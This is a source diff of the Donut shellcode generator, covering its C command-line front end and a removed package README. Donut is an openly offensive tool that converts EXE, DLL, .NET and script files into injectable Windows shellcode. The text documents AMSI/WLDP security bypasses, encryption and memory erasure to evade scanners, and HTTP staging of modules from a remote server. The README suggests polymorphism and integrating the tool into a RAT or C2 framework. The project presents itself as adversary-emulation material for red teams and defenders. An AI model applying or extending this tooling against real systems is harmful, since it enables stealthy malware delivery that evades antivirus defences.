1965 static int validate_exit(opt_arg *arg, void *args) {
1966 char *str = (char*)args;
1967
1968 arg->u32 = 0;
1969 if(str == NULL) return 0;
1970
1971 if(strlen(str) == 1 && isdigit((int)*str)) {
1972 arg->u32 = atoi(str);
1973 } else {
1974 if(!strcasecmp("thread", str)) {
1975 arg->u32 = DONUT_OPT_EXIT_THREAD;
1976 } else
1977 if(!strcasecmp("process", str)) {
1978 arg->u32 = DONUT_OPT_EXIT_PROCESS;
1979 }
1980 }
1981
1982 switch(arg->u32) {
1983 case DONUT_OPT_EXIT_THREAD:
1984 case DONUT_OPT_EXIT_PROCESS:
1985 break;
1986 default: {
1987 printf("WARNING: Invalid exit option specified: %"PRId32" -- setting to thread\n", arg->u32);
1988 arg->u32 = DONUT_OPT_EXIT_THREAD;
1989 }
1990 }
1991 return 1;
1992 }
1993
1994 static int validate_entropy(opt_arg *arg, void *args) {
1995 char *str = (char*)args;
1996
1997 arg->u32 = 0;
1998 if(str == NULL) {
1999 DPRINT("NULL argument.");
2000 return 0;
2001 }
2002 if(strlen(str) == 1 && isdigit((int)*str)) {
2003 DPRINT("Converting %s to number.", str);
2004 arg->u32 = strtoul(str, NULL, 10);
2005 } else {
2006 if(!strcasecmp("none", str)) {
2007 arg->u32 = DONUT_ENTROPY_NONE;
2008 } else
2009 if(!strcasecmp("low", str)) {
2010 arg->u32 = DONUT_ENTROPY_RANDOM;
2011 } else
2012 if(!strcasecmp("full", str)) {
2013 arg->u32 = DONUT_ENTROPY_DEFAULT;
2014 }
2015 }
2016
2017 // validate
2018 switch(arg->u32) {
2019 case DONUT_ENTROPY_NONE:
2020 case DONUT_ENTROPY_RANDOM:
2021 case DONUT_ENTROPY_DEFAULT:
2022 break;
2023 default: {
2024 printf("WARNING: Invalid entropy option specified: %"PRId32" -- setting to default\n", arg->u32);
2025 arg->u32 = DONUT_ENTROPY_DEFAULT;
2026 }
2027 }
2028 return 1;
2029 }
2030
2031 // callback to validate format
2032 static int validate_format(opt_arg *arg, void *args) {
2033 char *str = (char*)args;
2034
2035 arg->u32 = 0;
2036 if(str == NULL) return 0;
2037
2038 // if it's a single digit, return it as binary
2039 if(strlen(str) == 1 && isdigit((int)*str)) {
2040 arg->u32 = atoi(str);
2041 } else {
2042 // otherwise, try map it to digit
2043 if(!strcasecmp("bin", str)) {
2044 arg->u32 = DONUT_FORMAT_BINARY;
2045 } else
2046 if(!strcasecmp("base64", str)) {
2047 arg->u32 = DONUT_FORMAT_BASE64;
2048 } else
2049 if(!strcasecmp("c", str)) {
2050 arg->u32 = DONUT_FORMAT_C;
2051 } else
2052 if(!strcasecmp("rb", str) || !strcasecmp("ruby", str)) {
2053 arg->u32 = DONUT_FORMAT_RUBY;
2054 } else
2055 if(!strcasecmp("py", str) || !strcasecmp("python", str)) {
2056 arg->u32 = DONUT_FORMAT_PYTHON;
2057 } else
2058 if(!strcasecmp("ps", str) || !strcasecmp("powershell", str)) {
2059 arg->u32 = DONUT_FORMAT_POWERSHELL;
2060 } else
2061 if(!strcasecmp("cs", str) || !strcasecmp("csharp", str)) {
2062 arg->u32 = DONUT_FORMAT_CSHARP;
2063 } else
2064 if(!strcasecmp("hex", str)) {
2065 arg->u32 = DONUT_FORMAT_HEX;
2066 }
2067 }
2068 // validate
2069 switch(arg->u32) {
2070 case DONUT_FORMAT_BINARY:
2071 case DONUT_FORMAT_BASE64:
2072 case DONUT_FORMAT_C:
2073 case DONUT_FORMAT_RUBY:
2074 case DONUT_FORMAT_PYTHON:
2075 case DONUT_FORMAT_POWERSHELL:
2076 case DONUT_FORMAT_CSHARP:
2077 case DONUT_FORMAT_HEX:
2078 break;
2079 default: {
2080 printf("WARNING: Invalid format specified: %"PRId32" -- setting to binary.\n", arg->u32);
2081 arg->u32 = DONUT_FORMAT_BINARY;
2082 }
2083 }
2084 return 1;
2085 }
2086
2087 // --bypass=w
2088 //
2089 //
2090 // a = amsi
2091 // e = etw
2092 // w = wldp
2093 //
2094 // --bypass=w
2095 static int validate_bypass(opt_arg *arg, void *args) {
2096 char *str = (char*)args;
2097
2098 arg->u32 = 0;
2099 if(str == NULL) return 0;
2100
2101 // just temporary
2102 arg->u32 = atoi(str);
2103
2104 return 1;
2105 }
2106
2107 // calback to validate headers options
2108 static int validate_headers(opt_arg *arg, void *args) {
2109 char *str = (char*)args;
2110
2111 arg->u32 = 0;
2112 if(str == NULL) return 0;
2113
2114 // just temporary
2115 arg->u32 = atoi(str);
2116
2117 return 1;
11712118 }
11722119
11732120 static void usage (void) {
1174 printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n");
1175
2121 printf(" usage: donut [options] <EXE/DLL/VBS/JS>\n\n");
2122 printf(" Only the finest artisanal donuts are made of shells.\n\n");
11762123 printf(" -MODULE OPTIONS-\n\n");
1177 printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n");
1178 printf(" -u <URL> HTTP server that will host the donut module.\n\n");
1179
2124 printf(" -n,--modname: <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.\n");
2125 printf(" -s,--server: <server> Server that will host the Donut module. Credentials may be provided in the following format: https://username:[email protected]/\n");
2126 printf(" -e,--entropy: <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)\n\n");
2127
11802128 printf(" -PIC/SHELLCODE OPTIONS-\n\n");
1181 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n");
1182 printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n");
1183 printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n");
1184
1185 printf(" -DOTNET OPTIONS-\n\n");
1186 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1187 printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n");
1188 printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n");
1189 printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
1190 printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n");
1191
2129 printf(" -a,--arch: <arch>,--cpu: <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).\n");
2130 printf(" -o,--output: <path> Output file to save loader. Default is \"loader.bin\"\n");
2131 printf(" -f,--format: <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex\n");
2132 printf(" -y,--fork: <addr> Create thread for loader and continue execution at <addr> supplied.\n");
2133 printf(" -x,--exit: <action> Exit behaviour. 1=Exit thread (default), 2=Exit process\n\n");
2134
2135 printf(" -FILE OPTIONS-\n\n");
2136 printf(" -c,--class: <namespace.class> Optional class name. (required for .NET DLL)\n");
2137 printf(" -d,--domain: <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.\n");
2138 printf(" -i,--input: <path>,--file: <path> Input file to execute in-memory.\n");
2139 printf(" -m,--method: <method>,--function: <api> Optional method or function for DLL. (a method is required for .NET DLL)\n");
2140 printf(" -p,--args: <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.\n");
2141 printf(" -w,--unicode Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)\n");
2142 printf(" -r,--runtime: <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
2143 printf(" -t,--thread Execute the entrypoint of an unmanaged EXE as a thread.\n\n");
2144
2145 printf(" -EXTRA-\n\n");
2146 #ifdef WINDOWS
2147 printf(" -z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.\n");
2148 #else
2149 printf(" -z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib\n");
2150 #endif
2151 printf(" -b,--bypass: <level> Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)\n\n");
2152 printf(" -k,--headers: <level> Preserve PE headers. 1=Overwrite (default), 2=Keep all\n\n");
2153 printf(" -j,--decoy: <level> Optional path of decoy module for Module Overloading.\n\n");
2154
11922155 printf(" examples:\n\n");
1193 printf(" donut -f c2.dll\n");
1194 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n");
1195 printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n");
2156 printf(" donut -ic2.dll\n");
2157 printf(" donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll\n");
2158 printf(" donut -iloader.dll -c TestClass -m RunProcess -p\"calc notepad\" -s http://remote_server.com/modules/\n");
11962159
11972160 exit (0);
11982161 }
11992162
12002163 int main(int argc, char *argv[]) {
12012164 DONUT_CONFIG c;
1202 char opt;
1203 int i, err;
1204 FILE *fd;
1205 char *mod_type, *payload="payload.bin",
1206 *arch_str[3] = { "x86", "AMD64", "x86+AMD64" };
1207 char *inst_type[2]= { "PIC", "URL" };
2165 int err;
2166 char *mod_type;
2167 char *arch_str[3] = { "x86", "amd64", "x86+amd64" };
2168 char *inst_type[2]= { "Embedded", "HTTP" };
12082169
12092170 printf("\n");
1210 printf(" [ Donut shellcode generator v0.9.2\n");
1211 printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n");
2171 printf(" [ Donut shellcode generator v0.9.3 (built " __DATE__ " " __TIME__ ")\n");
2172 printf(" [ Copyright (c) 2019-2021 TheWover, Odzhan\n\n");
12122173
12132174 // zero initialize configuration
12142175 memset(&c, 0, sizeof(c));
12152176
1216 // default type is position independent code for dual-mode (x86 + amd64)
1217 c.inst_type = DONUT_INSTANCE_PIC;
1218 c.arch = DONUT_ARCH_X84;
2177 // default settings
2178 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
2179 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
12192180 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
1220
1221 // parse arguments
1222 for(i=1; i<argc; i++) {
1223 // switch?
1224 if(argv[i][0] != '-' && argv[i][0] != '/') {
1225 usage();
1226 }
1227 opt = argv[i][1];
1228
1229 switch(opt) {
1230 // target cpu architecture
1231 case 'a':
1232 c.arch = atoi(get_param(argc, argv, &i));
1233 break;
1234 // bypass options
1235 case 'b':
1236 c.bypass = atoi(get_param(argc, argv, &i));
1237 break;
1238 // name of domain to use for .NET assembly
1239 case 'd':
1240 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1241 break;
1242 // EXE/DLL/VBS/JS/XSL file to embed in shellcode
1243 case 'f':
1244 strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1245 break;
1246 // runtime version to use for .NET DLL / EXE
1247 case 'r':
1248 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1249 break;
1250 // URL of remote module
1251 case 'u': {
1252 strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2);
1253 c.inst_type = DONUT_INSTANCE_URL;
1254 break;
1255 }
1256 // class of .NET assembly
1257 case 'c':
1258 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1259 break;
1260 // method of .NET assembly
1261 case 'm':
1262 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1263 break;
1264 // output file for payload
1265 case 'o':
1266 payload = get_param(argc, argv, &i);
1267 break;
1268 // parameters to method or DLL function
1269 case 'p':
1270 strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1);
1271 break;
1272 default:
1273 usage();
1274 break;
1275 }
1276 }
2181 c.headers = DONUT_HEADERS_OVERWRITE;// overwrites PE headers
2182 c.format = DONUT_FORMAT_BINARY; // default output format
2183 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
2184 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
2185 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
2186 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
2187
2188 // get options
2189 get_opt(argc, argv, OPT_TYPE_NONE, NULL, "h;?", "help", usage);
2190 get_opt(argc, argv, OPT_TYPE_DEC, &c.arch, "a", "arch", validate_arch);
2191 get_opt(argc, argv, OPT_TYPE_DEC, &c.bypass, "b", "bypass", validate_bypass);
2192 get_opt(argc, argv, OPT_TYPE_DEC, &c.headers, "k", "headers", validate_headers);
2193 get_opt(argc, argv, OPT_TYPE_STRING, c.cls, "c", "class", NULL);
2194 get_opt(argc, argv, OPT_TYPE_STRING, c.domain, "d", "domain", NULL);
2195 get_opt(argc, argv, OPT_TYPE_DEC, &c.entropy, "e", "entropy", validate_entropy);
2196 get_opt(argc, argv, OPT_TYPE_DEC, &c.format, "f", "format", validate_format);
2197 get_opt(argc, argv, OPT_TYPE_STRING, c.input, "i", "input;file", NULL);
2198 get_opt(argc, argv, OPT_TYPE_STRING, c.method, "m", "method;function", NULL);
2199 get_opt(argc, argv, OPT_TYPE_STRING, c.modname, "n", "modname", NULL);
2200 get_opt(argc, argv, OPT_TYPE_STRING, c.decoy, "j", "decoy", NULL);
2201 get_opt(argc, argv, OPT_TYPE_STRING, c.output, "o", "output", NULL);
2202 get_opt(argc, argv, OPT_TYPE_STRING, c.args, "p", "params;args", NULL);
2203 get_opt(argc, argv, OPT_TYPE_STRING, c.runtime, "r", "runtime", NULL);
2204 get_opt(argc, argv, OPT_TYPE_STRING, c.server, "s", "server", NULL);
2205 get_opt(argc, argv, OPT_TYPE_FLAG, &c.thread, "t", "thread", NULL);
2206 get_opt(argc, argv, OPT_TYPE_FLAG, &c.unicode, "w", "unicode", NULL);
2207 get_opt(argc, argv, OPT_TYPE_DEC, &c.exit_opt,"x", "exit", validate_exit);
2208 get_opt(argc, argv, OPT_TYPE_HEX64, &c.oep, "y", "oep;fork", NULL);
2209 get_opt(argc, argv, OPT_TYPE_DEC, &c.compress,"z", "compress", NULL);
12772210
12782211 // no file? show usage and exit
1279 if(c.file[0] == 0) {
2212 if(c.input[0] == 0) {
12802213 usage();
12812214 }
12822215
1283 // generate payload from configuration
2216 // server specified?
2217 if(c.server[0] != 0) {
2218 c.inst_type = DONUT_INSTANCE_HTTP;
2219 }
2220
2221 // generate loader from configuration
12842222 err = DonutCreate(&c);
1285
1286 if(err != DONUT_ERROR_SUCCESS) {
1287 printf(" [ Error : %s\n", err2str(err));
2223
2224 if(err != DONUT_ERROR_OK) {
2225 printf(" [ Error : %s\n", DonutError(err));
12882226 return 0;
12892227 }
12902228
13072245 case DONUT_MODULE_JS:
13082246 mod_type = "JScript";
13092247 break;
1310 case DONUT_MODULE_XSL:
1311 mod_type = "XSL";
1312 break;
13132248 default:
13142249 mod_type = "Unrecognized";
13152250 break;
13162251 }
2252
13172253 printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]);
1318 printf(" [ Module file : \"%s\"\n", c.file );
2254 printf(" [ Module file : \"%s\"\n", c.input);
2255 printf(" [ Entropy : %s\n",
2256 c.entropy == DONUT_ENTROPY_NONE ? "None" :
2257 c.entropy == DONUT_ENTROPY_RANDOM ? "Random Names" : "Random names + Encryption");
2258
2259 if(c.compress != DONUT_COMPRESS_NONE) {
2260 printf(" [ Compressed : %s (Reduced by %"PRId32"%%)\n",
2261 c.compress == DONUT_COMPRESS_APLIB ? "aPLib" :
2262 c.compress == DONUT_COMPRESS_LZNT1 ? "LZNT1" : "Xpress",
2263 file_diff(c.zlen, c.len));
2264 }
2265
13192266 printf(" [ File type : %s\n", mod_type);
13202267
13212268 // if this is a .NET DLL, display the class and method
13222269 if(c.mod_type == DONUT_MODULE_NET_DLL) {
13232270 printf(" [ Class : %s\n", c.cls );
13242271 printf(" [ Method : %s\n", c.method);
2272 printf(" [ Domain : %s\n",
2273 c.domain[0] == 0 ? "Default" : c.domain);
13252274 } else
13262275 if(c.mod_type == DONUT_MODULE_DLL) {
13272276 printf(" [ Function : %s\n",
13282277 c.method[0] != 0 ? c.method : "DllMain");
13292278 }
2279
13302280 // if parameters supplied, display them
1331 if(c.param[0] != 0) {
1332 printf(" [ Parameters : %s\n", c.param);
2281 if(c.args[0] != 0) {
2282 printf(" [ Parameters : %s\n", c.args);
13332283 }
13342284 printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]);
13352285
1336 if(c.inst_type == DONUT_INSTANCE_URL) {
2286 if(c.inst_type == DONUT_INSTANCE_HTTP) {
13372287 printf(" [ Module name : %s\n", c.modname);
1338 printf(" [ Upload to : %s\n", c.url);
2288 printf(" [ Upload to : %s\n", c.server);
13392289 }
13402290
13412291 printf(" [ AMSI/WDLP : %s\n",
1342 c.bypass == DONUT_BYPASS_SKIP ? "skip" :
1343 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
1344
1345 printf(" [ Shellcode : \"%s\"\n\n", payload);
1346 fd = fopen(payload, "wb");
1347
1348 if(fd != NULL) {
1349 fwrite(c.pic, sizeof(char), c.pic_len, fd);
1350 fclose(fd);
1351 } else {
1352 printf(" [ Error opening \"%s\" for payload.\n", payload);
1353 }
1354 // release resources
2292 c.bypass == DONUT_BYPASS_NONE ? "none" :
2293 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
2294
2295 printf(" [ PE Headers : %s\n",
2296 c.headers == DONUT_HEADERS_OVERWRITE ? "overwrite" :
2297 c.headers == DONUT_HEADERS_KEEP ? "keep" : "Undefined");
2298
2299 printf(" [ Shellcode : \"%s\"\n", c.output);
2300 if(c.oep != 0) {
2301 printf(" [ OEP : 0x%"PRIX64"\n", c.oep);
2302 }
2303
2304 // if decoy supplied, display the path
2305 if(c.decoy[0] != 0) {
2306 printf(" [ Decoy path : %s\n", c.decoy);
2307 }
2308
2309 printf(" [ Exit : %s\n",
2310 c.exit_opt == DONUT_OPT_EXIT_THREAD ? "Thread" :
2311 c.exit_opt == DONUT_OPT_EXIT_PROCESS ? "Process" : "Undefined");
13552312 DonutDelete(&c);
13562313 return 0;
13572314 }
13582315 #endif
2316
+0
-264
donut_shellcode.egg-info/PKG-INFO
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
